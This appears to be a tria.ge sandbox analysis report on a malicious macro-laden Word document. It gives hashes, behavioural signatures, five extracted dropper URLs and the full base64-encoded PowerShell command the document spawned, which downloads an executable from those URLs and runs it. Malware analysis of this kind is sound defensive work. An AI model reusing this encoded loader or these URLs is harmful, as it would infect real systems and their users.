Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    28/05/2024, 23:20

General

  • Target

    7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc

  • Size

    148KB

  • MD5

    7ebdfc51b5db238b10845f5779b9861f

  • SHA1

    e8fe96482813fe09819fabdcdc36f6e837c804ca

  • SHA256

    6964b98e57e916fabb11b9325e9610748e9154a71cd4a51c3f1eb9f26a3026c3

  • SHA512

    4d1d8ece04a893a4f3c89d1765df8f6e418eb1d660261085afd735f9700b5ace18bb631bd8cd04a03fc5580ef642cbb8d9aeb869d106c3e3109bac5609ffc891

  • SSDEEP

    3072:l77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qYIdp8CZZyOdyPntYh:l77HUUUUUUUUUUUUUUUUUUUT52VgYCZR

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://harazoil.com/wp-content/r7v83/

exe.dropper

https://babalublog.com/image/h5jo1ao23800/

exe.dropper

http://bigbrushmedia.com/wvvw/aljrz25/

exe.dropper

http://blipin.com/vna984247/

exe.dropper

http://bmserve.com/mobile/m1z5378/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2348
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2112
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e JAB6ADcANQBfADcAMAAxADMAPQAnAGQAMQAwADUANABfADQANQAnADsAJABuADYANQA1ADkANQA4ADgAIAA9ACAAJwA5ADYAOAAnADsAJABSADMANAA0ADEANgA9ACcAZAA3ADUANgAwAF8AMwA1ACcAOwAkAHQAMABfADUANQA5ADYANAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbgA2ADUANQA5ADUAOAA4ACsAJwAuAGUAeABlACcAOwAkAGIAOAA0AF8AMAAyADgANwA9ACcAbgAxADQAOAAxADUAJwA7ACQAegAwADQAMgA3ADkANQA0AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAHcAZQBgAEIAYwBgAEwASQBFAG4AdAA7ACQAUwA5ADQAXwAwADcAMAAxAD0AJwBoAHQAdABwADoALwAvAGgAYQByAGEAegBvAGkAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHIANwB2ADgAMwAvAEAAaAB0AHQAcABzADoALwAvAGIAYQBiAGEAbAB1AGIAbABvAGcALgBjAG8AbQAvAGkAbQBhAGcAZQAvAGgANQBqAG8AMQBhAG8AMgAzADgAMAAwAC8AQABoAHQAdABwADoALwAvAGIAaQBnAGIAcgB1AHMAaABtAGUAZABpAGEALgBjAG8AbQAvAHcAdgB2AHcALwBhAGwAagByAHoAMgA1AC8AQABoAHQAdABwADoALwAvAGIAbABpAHAAaQBuAC4AYwBvAG0ALwB2AG4AYQA5ADgANAAyADQANwAvAEAAaAB0AHQAcAA6AC8ALwBiAG0AcwBlAHIAdgBlAC4AYwBvAG0ALwBtAG8AYgBpAGwAZQAvAG0AMQB6ADUAMwA3ADgALwAnAC4AUwBQAEwASQB0ACgAJwBAACcAKQA7ACQARgA3ADYANQA3ADMAOQA9ACcAZAAxADUAMQA3ADQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHQAMAA4ADEANAAxADkAIABpAG4AIAAkAFMAOQA0AF8AMAA3ADAAMQApAHsAdAByAHkAewAkAHoAMAA0ADIANwA5ADUANAAuAGQATwBXAG4AbABvAGEARABmAEkATABFACgAJAB0ADAAOAAxADQAMQA5ACwAIAAkAHQAMABfADUANQA5ADYANAApADsAJABkAF8ANAA0ADIANwA1AD0AJwBKADYANAA4ADYANQA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdAAwAF8ANQA1ADkANgA0ACkALgBsAEUAbgBHAHQAaAAgAC0AZwBlACAAMwA2ADIAMwA2ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHQAMABfADUANQA5ADYANAA7ACQATQAyADIAMgAzADcAXwA9ACcAaQAxADIAOQA4ADMANQAnADsAYgByAGUAYQBrADsAJABHAF8AMQAyAF8AMgA9ACcAdwA2ADIANwAyADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA0ADYAMAAyADgAMwA1AD0AJwBRADEAOAA3ADUAMQBfAF8AJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      e53ac1de9dc5076c6ffe73baa238a697

      SHA1

      0e96b3e3498ad7614096f10a5012900f39cf4250

      SHA256

      7e2ed36eda74d2579c1c1501d3c012d442496abb28455dee5ac5ff667a646300

      SHA512

      674318b49d1b178e857b1cb538f90a5b34c29a9dab4679013da83333110e582f40c89ac7368b2dba7b4812ad099125627d9237bf3612a1a24c1cfac659dbec2a

    • memory/2348-20-0x0000000006700000-0x0000000006800000-memory.dmp

      Filesize

      1024KB

    • memory/2348-13-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-7-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-12-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-21-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-0-0x000000002FF41000-0x000000002FF42000-memory.dmp

      Filesize

      4KB

    • memory/2348-16-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-2-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-19-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-15-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-58-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-57-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-37-0x000000007194D000-0x0000000071958000-memory.dmp

      Filesize

      44KB

    • memory/2348-38-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/2348-39-0x00000000064E0000-0x00000000065E0000-memory.dmp

      Filesize

      1024KB

    • memory/2348-40-0x0000000006700000-0x0000000006800000-memory.dmp

      Filesize

      1024KB

    • memory/2348-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2348-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2660-28-0x0000000002860000-0x0000000002868000-memory.dmp

      Filesize

      32KB

    • memory/2660-27-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB